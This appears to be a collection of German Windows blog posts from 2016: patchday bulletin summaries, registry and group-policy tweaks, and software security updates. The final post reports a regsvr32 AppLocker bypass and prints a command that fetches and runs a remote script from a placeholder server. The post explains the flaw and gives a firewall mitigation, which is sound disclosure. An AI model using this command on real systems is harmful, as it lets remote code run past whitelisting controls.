Kategorie: Windows

Microsoft-Patchday Juli 2016

Microsoft Logo

Morgen, am 12. Juli 2016 (zweiter Dienstag im Monat) steht der nächste Microsoft-Patchday an. Insgesamt beinhaltet der Juli-Patchday elf Security-Bulletins, von denen sechs als „kritisch“ und fünf als „hoch“ eingestuft werden. Wie fast jeden Monat ist auch dieses Mal wieder eine kritische Sicherheitslücke bei Microsofts neuem Edge-Browser unter Windows 10 vorhanden.

Nachfolgend ein grober Überblick der zur Verfügung stehenden sicherheitsrelevanten Updates. Weitere Details stellt Microsoft wie immer im Security TechCenter zur Verfügung. Üblicherweise funktioniert der Link bei Microsoft meist immer erst am Dienstagnachmittag bzw. Abend deutscher Zeit.

Bulletin ID Bulletin Title Maximum Severity Rating and Vulnerability Impact Restart Requirement Affected Software
MS16-084  Cumulative Security Update for Internet Explorer (3169991) Critical
Remote Code Execution
Requires restart Internet Explorer on all supported releases of Microsoft Windows.
MS16-085  Cumulative Security Update for Microsoft Edge (3169999) Critical
Remote Code Execution
Requires restart Microsoft Edge on all supported releases of Windows 10.
MS16-086  Cumulative Security Update for JScript and VBScript (3169996) Critical
Remote Code Execution
May require restart Windows Vista, Windows Server 2008, and Windows Server 2008 R2.
MS16-087  Security Update for Windows Print Spooler Components (3170005) Critical
Remote Code Execution
May require restart All supported releases of Microsoft Windows.
MS16-088  Security Update for Microsoft Office (3170008) Critical
Remote Code Execution
May require restart Microsoft Office 2007, Office 2010, Office 2013, Office 2013 RT, Office 2016, Office for Mac 2011, Office 2016 for Mac, Office Compatibility Pack, Excel Viewer, Word Viewer, Word Automation Services on SharePoint Server 2010, Word Automation Services on SharePoint Server 2013, Office Web Apps 2010, Office Web Apps 2013, SharePoint Server 2016, and Office Online Server.
MS16-089  Security Update for Windows Secure Kernel Mode (3170050) Important
Information Disclosure
Requires restart All supported releases of Microsoft Windows 10.
MS16-090  Security Update for Windows Kernel-Mode Drivers (3171481) Important
Elevation of Privilege
Requires restart All supported releases of Microsoft Windows.
MS16-091  Security Update for .NET Framework (3170048) Important
Information Disclosure
May require restart Supported releases of .NET Framework on supported releases of Microsoft Windows.
MS16-092  Security Update for Windows Kernel (3171910) Important
Security Feature Bypass
Requires restart Microsoft Windows 8.1, Windows Server 2012, Windows Server 2012 R2, Windows RT 8.1, and Windows 10.
MS16-093  Security Update for Adobe Flash Player (3174060) Critical
Remote Code Execution
Requires restart Microsoft Windows 8.1, Windows Server 2012, Windows Server 2012 R2, Windows RT 8.1, and Windows 10.
MS16-094  Security Update for Secure Boot (3177404) Important
Security Feature Bypass
Requires restart Microsoft Windows 8.1, Windows Server 2012, Windows Server 2012 R2, Windows RT 8.1, and Windows 10.

Kategorien: Windows

Windows 10: Alte Lautstärkeregelung reaktivieren

Windows 10 Logo

Mit Windows 10 hat Microsoft die Lautstärkeregelung im Systemtray optisch überarbeitet. Wer aber lieber die Variante von Windows 7 nutzen möchte, kann die alte Lautstärkeregelung ganz einfach wieder aktivieren.

Windows 10 Lautstärkeregelung

Windows 10 Lautstärkeregelung: Links Standard, rechts alte Variante

Die alte Lautstärkeregelung kann mit Hilfe des Registrierungs-Editors wieder aktiviert werden. Folgendermaßen müsst ihr vorgehen:

  1. Den Ausführen-Dialog (Windows-Taste + R) öffnen und “regedit” eingeben, damit der Registrierungs-Editor geöffnet wird.
  2. Anschließend zu folgendem Pfad navigieren:
    HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion
  3. Wenn der Schlüssel “MTCUVC” im linken Verzeichnisbaum nicht vorhanden ist, muss dieser von Hand erstellt werden.
  4. Darunter muss dann ein neuer “DWORD-Wert (32-Bit)” mit dem Namen “EnableMtcUvc” und dem Wert “0” erstellt werden.
  5. Die alte Lautstärkeregelung ist wieder aktiviert. Zum Deaktivieren einfach den Wert auf  “1” setzen oder den Schlüssel “MTCUVC” wieder löschen.

Zur einfacheren Umsetzung biete ich eine Registrierungsdatei an, die alle Änderungen in der Registry automatisch durchführt.

Microsoft löst einige Probleme bei der Windows 10 Aktivierung

Windows 10 Logo

Kurz vor Veröffentlichung des Windows 10 Anniversary Updates am 02. August hat Microsoft mit der Windows 10 Insider Preview Build 14371 eine kleine Überraschung an Bord. Ab sofort hat Windows 10 einen Aktivierungs-Troubleshooter eingebaut, welcher mit dem Anniversary Update für alle Nutzer zur Verfügung steht. Damit sollen laut Microsoft diverse Aktivierungsprobleme der Vergangenheit angehören.

Seit der Veröffentlichung von Windows 10 vor einem Jahr kommt es immer wieder zur Verwirrung bei der Aktivierung und Lizenzierung von Windows 10. Wer sich im Internet auf die Suche macht, wird sehr schnell viele Fragen zu diesen Themen finden. Leider sind die Antworten teilweise widersprüchlich und am Ende finden sich nur noch mehr offene Fragen. Auch ich habe einige Male darüber berichtet, beispielsweise hier und hier. Mit dem Troubleshoot-Tool möchte Microsoft jetzt einige Fragen und Probleme lösen.

Ihr erinnert euch vielleicht: Anfangs musste man von einem aktivierten Windows 7 oder Windows 8.1 starten und dort dann das Upgrade auf Windows 10 durchführen. Windows 10 wurde dann automatisch durch den Abgleich eines vorher erstellten digitalen Fingerabdrucks (“Digital Entitlement”) aktiviert. Mit dem November-Update (Windows 10 Version 1511) kam dann die Möglichkeit hinzu, Windows 10 mit Produkt-Keys von Windows 7, 8 oder 8.1 zu aktivieren. Im Hintergrund wird aber auch hier ein digitaler Fingerabdruck erstellt. Ab sofort kann diese digitale Windows-10-Lizenz mit eurem Microsoft-Konto gekoppelt werden. Sofern man mit einem Microsoft-Konto auf einem Windows-10-Gerät angemeldet ist geschieht dies automatisch. Bei Problemen – insbesondere beim Tausch von Hardware wie Festplatten oder Mainboards – soll der Troubleshooter eine einfache und schnelle Reaktivierung ermöglichen.

Dennoch sind noch nicht alle Fragen und Probleme geklärt. Wie verhält es sich bei OEM- oder Systembuilder-Lizenzen? Muss man seine digitale Lizenz zwangsweise mit einem Microsoft-Konto koppeln oder hilft der Aktivierungs-Troubleshooter auch ohne Konto? Dennoch ist es erfreulich, dass sich Microsoft endlich den bestehenden Problemen annimmt und eine Lösung anbietet. Wie sich der Aktivierungs-Troubleshooter in der Praxis schlägt werden wir spätestens im August sehen.

Kategorien: Windows Windows 10

Windows 10 Anniversary Update erscheint am 2. August 2016

Windows 10 Logo

Heute hat Microsoft den Termin für die Veröffentlichung des Windows 10 Anniversary Updates bekannt gegeben. Demnach erscheint das Update erst am 2. August 2016 und nicht, wie bisher vermutet, am 29. Juli 2016. In meinen Augen etwas seltsam, denn der Name “Anniversary Update” würde eher auf den Jahrestag der Windows-10-Einführung hindeuten. Außerdem läuft auch die einjährige Frist des Gratis-Upgrades am 29. Juli ab. Interessant in diesem Zusammenhang ist noch, ob die neue Versionsbezeichnung nach wie vor 1607 lautet oder auf 1608 angepasst wird.

Außerdem hat Microsoft verlauten lassen, dass mittlerweile 350 Millionen Geräte mit Windows 10 laufen. Vor rund drei Monaten waren es 270 Millionen.

Kategorien: Windows Windows 10

KeePass Version 2.34 schließt Sicherheitslücke

KeePass Logo

Anfang Juni wurde bekannt, dass KeePass 2 durch eine Schwachstelle in der integrierten Update-Funktion angreifbar ist. Der Entwickler wurde bereits im Februar über die Sicherheitslücke informiert, meinte dann aber nur, dass HTTPS aus mehreren Gründen keine praktikable Lösung sei. Im Juni meldete er sich dann bei Sourceforge und versprach eine baldige Lösung. Diese wurde dann überraschend schnell am 11.06.2016 in Form von KeePass 2.34 veröffentlicht.

Zum einen läuft der Update-Check nun über HTTPS (bisher HTTP) und zum anderen wird die Versionsinformations-Datei ab Version 2.34 digital signiert (RSA-4096 / SHA-512). Damit wurde die Sicherheitslücke behoben. Darüber hinaus erlaubt die neue Version nun auch Plugins die Nutzung von signierten Versionsinformations-Dateien. Eine Übersicht aller Änderungen findet ihr im Changelog:

Changes from 2.33 to 2.34:

New Features:

  • The version information file (which the optional update check downloads to see if there exists a newer version) is now digitally signed (using RSA-4096 / SHA-512); furthermore, it is downloaded over HTTPS.
  • Added option ‘Lock workspace when minimizing main window to tray’.
  • Added option ‘Esc minimizes to tray instead of locking the workspace’.
  • Added Ctrl+Q shortcut for closing KeePass (as alternative to Alt+F4).
  • Added UIFlags bit for disabling the ‘Check for Updates’ menu item.
  • The installers (regular and MSI) now create an empty ‘Plugins’ folder in the application directory, and the portable package now also contains such a folder.
  • Plugins: added support for digitally signed version information files.

Improvements:

  • Plugins are now loaded only directly from the application directory and from any subdirectory of the ‘Plugins’ folder in the application directory.
  • Improved startup performance (by filtering plugin candidates).
  • When closing a database, KeePass now searches and deletes any temporary files that may have been created and forgotten by MSHTML when printing failed.
  • CHM help file: improved high DPI support.
  • Various code optimizations.
  • Minor other improvements.

Bugfixes:

  • (None).

Download KeePass 2

Kategorien: Software & Apps Windows

PowerShell: Gruppenrichtlinien via ID finden

In der Ereignisanzeige tauchen manchmal Fehlermeldungen auf, die auf eine fehlerhafte Gruppenrichtlinie (GPO) hindeuten. Leider wird dort jedoch nur die GPO-ID aufgeführt, ohne weitere Hinweise darauf, um welche GPO es sich handelt.

Normalerweise stünde jetzt eine Suche auf dem Domänencontroller (DC) an. Doch es geht auch einfacher. Mit Hilfe der PowerShell lassen sich weitere Informationen zur betreffenden GPO herausfinden, beispielsweise Name, Version und letztes Änderungsdatum.

get-gpo -all | where {$_.id -match "xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx"}

Kategorien: Tutorials Windows

Windows 10: Werbe-Apps im Startmenü entfernen

Windows 10 Logo

Windows 10 zeigt im Startmenü standardmäßig App-Empfehlungen an. Darunter befinden sich beispielsweise Twitter, Flipboard oder Candy Crush Soda. Dabei handelt es sich um Verknüpfungen, die per Klick zu den jeweiligen Apps im Windows Store führen. Mit dem bevorstehenden “Anniversary Update” alias Windows 10 Version 1607, soll die Anzahl der angezeigten “Werbe-Apps” sogar noch erhöht werden. Dieser Tipp zeigt euch, wie ihr die App-Empfehlungen deaktivieren könnt.

Möglichkeit 1: Einstellungen

Zunächst müsst ihr die Einstellungen öffnen und auf  den Punkt “Personalisierung” klicken. Anschließend links im Menü auf “Start” klicken und die Option “Gelegentlich Vorschläge im Menü Start” anzeigen” deaktivieren.

Bereits bestehende App-Empfehlungen im Startmenü müssen ggf. manuell per Rechtsklick entfernt werden.

Möglichkeit 2: Editor für lokale Gruppenrichtlinien

Diese Möglichkeit existiert nur unter Windows 10 Pro oder Enterprise und greift gleichzeitig nur für neu erstellte Benutzer, nachdem die Option gesetzt wurde.

  1. Den Ausführen-Dialog (Windows-Taste + R) öffnen und “gpedit.msc” eingeben.
  2. Unter “Computerkonfiguration” zu “Administrative Vorlagen”, “Windows-Komponenten” und “Cloudinhalt” wechseln.
  3. Im rechten Fensterbereich muss die Option “Microsoft-Anwederfeatures deaktivieren” aktiviert werden.
  4. Bei neu erstellten Benutzern erscheinen keine Werbe-Apps mehr.

Möglichkeit 3: Registrierungs-Editor

Die zweite Möglichkeit via Registry funktioniert unter allen Windows 10 Editionen. Die Einstellung greift allerdings ebenfalls nur für neu anzulegende Benutzer.

  1. Den Ausführen-Dialog (Windows-Taste + R) öffnen und “regedit” eingeben, damit der Registrierungs-Editor geöffnet wird.
  2. Anschließend zu folgendem Pfad navigieren:
    HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CloudContent
  3. Wenn der Schlüssel “CloudContent” im linken Verzeichnisbaum nicht vorhanden ist, muss dieser von Hand erstellt werden.
  4. Darunter muss dann ein neuer “DWORD-Wert (32-Bit)” mit dem Namen “DisableWindowsConsumerFeatures” und dem Wert “1” erstellt werden.
  5. Bei neu erstellten Benutzern erscheinen keine Werbe-Apps mehr.

Zur einfacheren Umsetzung biete ich eine Registrierungsdatei an, die alle Änderungen in der Registry automatisch durchführt.

Windows 10 Version 1607 aka “Anniversary Update” kommt am 29. Juli 2016

Windows 10 Logo

Der Name “Anniversary Update” hatte es schon vermuten lassen, aber jetzt wurde der Erscheinungstermin von Windows 1607 durch Microsoft-Unterlagen bestätigt. Demnach erscheint das nächste große Windows 10 Update am 29. Juli 2016, also genau ein Jahr nach der Einführung von Windows 10. Das Datum wurde in einer Präsentation der WinHEC-Konferenz erwähnt.

Auf die Neuerungen des “Anniversary Updates” bin ich bereits in einem Artikel eingegangen.

Quelle: WinHEC Slides - Introduction of the New Universal Dev Center for Hardware

Quelle: Microsoft / WinHEC Slides – Introduction of the New Universal Dev Center for Hardware

Kategorien: Windows Windows 10

7-Zip 16.00 behebt kritische Sicherheitslücken

7-Zip Logo

Das beliebte Open-Source-Packprogramm 7-Zip ist vor wenigen Tagen in Version 16.00 erschienen. Einzige große Neuerung ist die Unterstützung von Multi-ZIP-Archiven nach dem Namensschema z01, z02, …, zip. Dennoch sollte das Update schnellstmöglich installiert werden, denn damit werden auch einige Fehler und zwei kritische Sicherheitslücken behoben.

Die Sicherheitslücken wurden von Sicherheitsforschern der Cisco-Tochter Talos entdeckt. Genauere Details wurden in einem Blogartikel veröffentlicht. Beide Lücken sind in der neuen Version 16.00 bereits behoben. Allerdings wird die Open-Source-Bibliothek 7-Zip gerne in anderen Programmen zum Packen und Entpacken von Dateien verwendet. Besonders brisant ist diese Thematik beispielsweise bei Anti-Viren-Software, da diese in der Regel mit Systemrechten arbeitet und der 7-Zip-Schadcode dann ebenfalls mit Systemrechten ausgeführt wird. Bekannte Produkte, die 7-Zip einsetzen, sind unter anderem Malwarebytes Anti-Malware oder die Produkte von FireEye. Darüber hinaus dürften aber noch viele weitere Produkte auf 7-Zip setzen.

Download 7-Zip

Kategorien: Software & Apps Windows

Cortana deaktivieren ab Windows 10 Version 1607

Windows 10 Logo

In meinem Artikel “Windows 10: Cortana deaktivieren, Offline-Suche aktivieren” habe ich bereits beschrieben, wie sich Cortana bis Windows 10 Version 1511 (Build 10586) deaktivieren lässt. Mit dem aufkommenden Anniversary Update funktioniert diese Methode allerdings nicht mehr. Nachfolgend die neuen Möglichkeiten, wie Cortana ab Windows 10 Version 1607 bzw. Build 14328 deaktiviert werden kann.

Möglichkeit 1: Editor für lokale Gruppenrichtlinien

Diese Möglichkeit existiert nur unter Windows 10 Pro oder Enterprise.

  1. Den Ausführen-Dialog (Windows-Taste + R) öffnen und “gpedit.msc” eingeben.
  2. Unter “Computerkonfiguration” zu “Administrative Vorlagen”, “Windows-Komponenten” und “Suche” wechseln.
  3. Im rechten Fensterbereich die beiden Optionen “Cortana zulassen” und “Der Suche und Cortana die Nutzung von Positionsdaten erlauben” auf “Deaktiviert” stellen.
  4. Zusätzlich könnt ihr auch die Websuche deaktivieren. Dazu müssen die beiden Optionen “Websuche nicht zulassen” und “Nicht im Web suchen und keine Webergebnisse in der Suche anzeigenaktiviert werden.
  5. Nach einem Neustart der “Explorer.exe” oder des kompletten PCs ist Cortana deaktiviert.

Möglichkeit 2: Registrierungs-Editor

Ab Windows 10 Version 1803 funktioniert die Abschaltung der Websuche nicht mehr so wie hier beschrieben. Weitere Infos findet ihr in meinem Beitrag “Cortana-Websuche deaktivieren ab Windows 10 Version 1803“.

Die zweite Möglichkeit via Registry funktioniert unter allen Windows 10 Editionen.

  1. Den Ausführen-Dialog (Windows-Taste + R) öffnen und “regedit” eingeben, damit der Registrierungs-Editor geöffnet wird.
  2. Anschließend zu folgendem Pfad navigieren:
    HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Windows Search
  3. Wenn der Schlüssel “Windows Search” im linken Verzeichnisbaum nicht vorhanden ist, muss dieser von Hand erstellt werden.
  4. Darunter muss dann ein neuer “DWORD-Wert (32-Bit)” mit dem Namen “AllowCortana” und dem Wert “0” erstellt werden.
  5. Unter Windows 10 x64 muss dieser DWORD-Wert auch noch unter folgendem Pfad angelegt werden:
    HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows\Windows Search
  6. Falls die Websuche auch deaktiviert werden soll, müssen zusätzlich die DWORD-Werte “AllowSearchToUseLocation” (“0“), “ConnectedSearchUseWeb” (“0“), “DisableWebSearch” (“1“) und “ConnectedSearchPrivacy(3) erstellt werden (siehe Screenshot).
  7. Zur Deaktivierung von Cortana muss die “Explorer.exe” oder der gesamte PC neugestartet werden.

Zur einfacheren Umsetzung biete ich eine Registrierungsdatei an, die alle Änderungen in der Registry automatisch durchführt.


Microsoft-Patchday Mai 2016

Microsoft Logo

Heute ist der zweite Dienstag im Monat, was so viel bedeutet, dass heute wieder Microsoft-Patchday ist. Im Mai 2016 stehen insgesamt 16 sicherheitsrelevante Updates zur Installation bereit. Ja, irgendwie scheinen es jeden Monat mehr zu werden ;-) Davon werden acht als „kritisch“ und acht als „wichtig“ eingestuft.

Weitere Details stellt Microsoft wie immer im Security TechCenter zur Verfügung.

Bulletin ID Bulletin Title Maximum Severity Rating and Vulnerability Impact Restart Requirement Affected Software
MS16-051 Cumulative Security Update for Internet Explorer (3155533) Critical
Remote Code Execution
Requires restart Internet Explorer on all supported editions of Microsoft Windows.
MS16-052  Cumulative Security Update for Microsoft Edge (3155538) Critical
Remote Code Execution
Requires restart Microsoft Edge on Windows 10.
MS16-053  Cumulative Security Update for JScript and VBScript (3156764) Critical
Remote Code Execution
May require restart Windows Vista, Windows Server 2008, and Windows Server 2008 R2.
MS16-054  Security Update for Microsoft Office (3155544) Critical
Remote Code Execution
May require restart Microsoft Office 2007, Office 2010, Office 2013, Office 2013 RT, Office 2016, Office for Mac 2011, Office 2016 for Mac, Office Compatibility Pack, Word Viewer, SharePoint Server 2010, and Office Web Apps 2010.
MS16-055  Security Update for Microsoft Graphics Component (3156754) Critical
Remote Code Execution
Requires restart All supported editions of Microsoft Windows.
MS16-056  Security Update for Windows Journal (3156761) Critical
Remote Code Execution
May require restart Windows Vista, Windows 7, Windows 8.1, Windows RT 8.1, and Windows 10.
MS16-057  Security Update for Windows Shell (3156987) Critical
Remote Code Execution
Requires restart Windows 8.1, Windows Server 2012 R2, Windows RT 8.1, and Windows 10.
MS16-058  Security Update for Windows IIS (3141083) Important
Remote Code Execution
Requires restart Windows Vista and Windows Server 2008.
MS16-059  Security Update for Windows Media Center (3150220) Important
Remote Code Execution
May require restart Windows Vista, Windows 7, and Windows 8.1.
MS16-060  Security Update for Windows Kernel (3154846) Important
Elevation of Privilege
Requires restart All supported editions of Microsoft Windows.
MS16-061  Security Update for Microsoft RPC (3155520) Important
Elevation of Privilege
Requires restart All supported editions of Microsoft Windows.
MS16-062  Security Update for Windows Kernel-Mode Drivers (3158222) Important
Elevation of Privilege
Requires restart All supported editions of Microsoft Windows.
MS16-064  Security Update for Adobe Flash Player (3157993) Critical
Remote Code Execution
Requires restart Windows 8.1, Windows Server 2012, Windows Server 2012 R2, Windows RT 8.1, and Windows 10.
MS16-065  Security Update for .NET Framework (3156757) Important
Information Disclosure
May require restart Microsoft .NET Framework 2.0 Service Pack 2, .NET Framework 3.5, .NET Framework 3.5.1, .NET Framework 4.5.2, .NET Framework 4.6, and .NET Framework 4.6.1 on affected releases of Microsoft Windows.
MS16-066  Security Update for Virtual Secure Mode (3155451) Important
Security Feature Bypass
Requires restart Windows 10 and Windows 10 version 1511.
MS16-067  Security Update for Volume Manager Driver (3155784) Important
Information Disclosure
May require restart Windows 8.1, Windows Server 2012, Windows Server 2012 R2, and Windows RT 8.1.

Kategorien: Windows

“Apps deaktivieren, um die Leistung zu verbessern”-Meldung im Info-Center unter Windows 10 deaktivieren

Windows 10 Logo

Unter Windows 10 wird im Info-Center eine Meldung angezeigt, wenn mindestens drei neue Apps automatisch gestartet und im Hintergrund ausgeführt werden: “Apps deaktivieren, um die Leistung zu verbessern”.

Dieser Hinweis ist für viele Nutzer störend und könnte den ein oder anderen auch verwirren. Glücklicherweise kann er relativ einfach entfernt werden.

Die Meldung wird durch eine geplante Aufgabe angestoßen, die ihr ohne Probleme deaktivieren könnt. Ihr findet die Aufgabe in der Aufgabenplanung unter “Windows”, “Application Experience” und “StartupAppTask”. Dort müsst ihr die Aufgabe deaktivieren. Ab dem nächsten Neustart sollte die nervige Meldung nicht mehr erscheinen.

 

Natürlich kann der Task auch automatisch via Skript deaktiviert werden, beispielsweise via Gruppenrichtlinie oder nach der Installation des Betriebssystems. Dazu wird eine Eingabeaufforderung (“cmd.exe”) mit Administrationsrechten benötigt:

schtasks /Change /TN "\Microsoft\Windows\Application Experience\StartupAppTask" /DISABLE

Bei einigen wenigen Usern soll das Deaktivieren der Aufgabe angeblich keine Abhilfe schaffen. In diesem Fall soll aber die zweite Methode erfolgreich sein. Dazu müsst ihr in der Systemsteuerung den Punkt “Sicherheit und Wartung” öffnen. Mit einem Klick auf “Meldungen zu Start-Apps deaktivieren” könnt ihr die störende Meldung ebenfalls eliminieren. Allerdings funktioniert dieser Tipp erst, sobald die Meldung im Info-Center erschienen ist.

Windows Server 2016 Technical Preview 5 verfügbar

Windows Server 2016 Logo

Microsoft hat eine Testversion von Windows Server 2016 veröffentlicht. Die Technical Preview 5 steht sowohl im MSDN, als auch im TechNet Evaluation Center zum Download bereit.

Die Neuerungen der TP5 hat Microsoft im TechnNet bekannt gegeben. Die frei erhältliche Testversion kann als ISO oder als Nano-Server-VHD heruntergeladen werden. Beide Varianten sind bis zum 31. Dezember 2016 lauffähig. Die finale Version von Windows Server 2016 ist für den Herbst geplant.

Download Windows Server Technical Preview 5

Kategorien: Software & Apps Windows

Neuerungen von Firefox 46

Firefox Logo 23+

Gestern wurde Firefox 46 veröffentlicht. Ursprünglich sollte Version 46 bereits am 19. April erscheinen, wurde von Mozilla dann jedoch um eine Woche verschoben. Grund hierfür waren Probleme mit der Multiprozess-Architektur Electrolysis (e10s), welche nun erst mit Firefox 48 in die finale Version Einzug halten soll. Dadurch sind in Version 46 so gut wie keine nennenswerten Neuerungen enthalten. Firefox 47 ist aber nach wie vor für den 07. Juni 2016 geplant.

  • Flüssigeres Scrollen durch Asynchronous Panning and Zooming (APZ)
  • Erhöhte Sicherheit für JIT-Compiler dank W^X-Protection (Write XOR Execute)
  • Linux-Version unterstützt GTK+ 3.
  • WebRTC-Implementierung ist zuverlässiger und bietet mehr Performance
  • Web-Crypto-API unterstützt HKDF
  • Behebung diverser Sicherheitslücken

Download Firefox 46
Download Firefox 46 (64 Bit)
Portable Firefox 46 @ Horst Scheuer

Windows-Schwachstelle erlaubt Umgehung von AppLocker

Microsoft Logo

Das Sicherheitsfeature AppLocker wurde mit Windows 7 eingeführt (nur bei Enterprise bzw. Ultimate vorhanden) und kommt hauptsächlich in Unternehmen zum Einsatz. AppLocker ermöglicht die Steuerung von Anwendungen, App-Paketen, DLLs und Skripten. Damit lassen sich beispielsweise bestimmte Programme auf Black- oder Whitelists setzen. In letzter Zeit wird AppLocker auch häufig gegen Malware und Ransomware eingesetzt, um ungewünschte Aktivitäten auf Systemen zu blockieren. Allerdings wurde jetzt eine Schwachstelle bekannt, wie sich die AppLocker-Ausführungsregeln relativ leicht umgehen lassen.

Der Sicherheitsforscher Casey Smith hat eine Schwachstelle entdeckt, wobei AppLocker mit Hilfe des Befehlszeilenprogramms “Regsvr32” (Microsoft Register Server) ausgehebelt werden kann. Regsvr32 wird üblicherweise zum Registrieren von DLL-Dateien verwendet, was im Normalfall allerdings Administratorrechte erfordert. Jetzt kommt der spannende Punkt: Wenn man dem Register Server eine JavaScript- oder VBScript-Datei übergibt, wird diese ohne weitere Nachfrage ausgeführt. Auch AppLocker greift hierbei nicht und es werden auch keine Administratorrechte angefordert.

regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll

Mit dieser Technik lassen sich auch Skripte über HTTP oder HTTPS nachladen, da Regsvr32 auch URLs akzeptiert. Da keine Änderungen an der Registry durchgeführt werden, ist ein Missbrauch auch relativ schwer zu erkennen. Bei Github existiert ein Proof of Concept mit einigen Beispiel-Skripten.

Microsoft wurde bereits über das Problem informiert, hat sich aber noch nicht zu Wort gemeldet. Bis dahin kann “regsvr32.exe” über die Windows Firewall blockiert werden, sodass zumindest eine Ausführung über das Netzwerk verhindert werden kann.